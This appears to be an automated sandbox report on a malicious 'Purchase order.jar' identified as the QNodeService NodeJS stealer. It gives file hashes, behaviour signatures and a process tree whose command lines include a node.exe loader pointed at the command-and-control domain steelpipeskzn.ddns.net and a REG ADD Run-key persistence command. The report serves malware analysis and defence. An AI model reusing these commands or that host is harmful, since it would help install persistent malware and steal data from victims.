Analysis
- max time kernel: 35s
- max time network: 126s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 05-11-2020 09:22
Static task: static1

Behavioral task: behavioral1
- Sample: Purchase order.jar
- Resource: win7v20201028 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: Purchase order.jar
- Resource: win10v20201028 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: Purchase order.jar
- Size: 85KB
- MD5: 204d0b9b7198ed31f81e004ed4c02445
- SHA1: 166a748ac03503cc764d3a8d8b67a891339bc85f
- SHA256: 6a772f09e9c6e88ea2999212c40ce98d5d310907c00971d4f1f9ba55c5e83131
- SHA512: 8a50084d5d2e492e03851c40b7fcf1f857825db476d4dbddd48187bf2babbc0ae247584183bee4de0a2fa6e77a4b86ee4327d0a4624b320e06a345420c39b3fc
- Score: 10/10
Malware Config
Signatures

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.

Executes dropped EXE (3 IoCs)
- PID 1316: node.exe
- PID 2192: node.exe
- PID 1388: node.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
- Key created: \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (process: reg.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\84599876-7cc9-43a2-b9e2-474c01689bb5 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" (process: reg.exe)
JavaScript code in executable (3 IoCs)
- behavioral2/files/0x000100000001ab9a-164.dat (yara rule: js)
- behavioral2/files/0x000100000001ab9a-167.dat (yara rule: js)
- behavioral2/files/0x000100000001ab9a-171.dat (yara rule: js)
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 20: wtfismyip.com
- flow 21: wtfismyip.com
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (process: node.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (process: node.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (process: node.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 (process: node.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz (process: node.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString (process: node.exe)
Suspicious behavior: EnumeratesProcesses (18 IoCs)
- PID 1316: node.exe (4 entries)
- PID 2192: node.exe (4 entries)
- PID 1388: node.exe (10 entries)
Suspicious use of WriteProcessMemory (12 IoCs)
- PID 1112 (java.exe) wrote to memory of 1364 (procid_target 77)
- PID 1112 (java.exe) wrote to memory of 1364 (procid_target 77)
- PID 1364 (javaw.exe) wrote to memory of 1316 (procid_target 81)
- PID 1364 (javaw.exe) wrote to memory of 1316 (procid_target 81)
- PID 1316 (node.exe) wrote to memory of 2192 (procid_target 83)
- PID 1316 (node.exe) wrote to memory of 2192 (procid_target 83)
- PID 2192 (node.exe) wrote to memory of 1388 (procid_target 84)
- PID 2192 (node.exe) wrote to memory of 1388 (procid_target 84)
- PID 1388 (node.exe) wrote to memory of 968 (procid_target 86)
- PID 1388 (node.exe) wrote to memory of 968 (procid_target 86)
- PID 968 (cmd.exe) wrote to memory of 3412 (procid_target 87)
- PID 968 (cmd.exe) wrote to memory of 3412 (procid_target 87)
Processes

1. C:\ProgramData\Oracle\Java\javapath\java.exe (PID 1112)
   Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\Purchase order.jar"
   - Suspicious use of WriteProcessMemory

   2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe (PID 1364)
      Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\29714f0c.tmp
      - Suspicious use of WriteProcessMemory

      3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID 1316)
         Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain steelpipeskzn.ddns.net
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory

         4. C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID 2192)
            Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VZ0ZSL\boot.js --hub-domain steelpipeskzn.ddns.net
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory

            5. C:\Users\Admin\node-v14.12.0-win-x64\node.exe (PID 1388)
               Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VZ0ZSL\boot.js --hub-domain steelpipeskzn.ddns.net
               - Executes dropped EXE
               - Checks processor information in registry
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of WriteProcessMemory

               6. C:\Windows\system32\cmd.exe (PID 968)
                  Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "84599876-7cc9-43a2-b9e2-474c01689bb5" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
                  - Suspicious use of WriteProcessMemory

                  7. C:\Windows\system32\reg.exe (PID 3412)
                     Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "84599876-7cc9-43a2-b9e2-474c01689bb5" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                     - Adds Run key to start application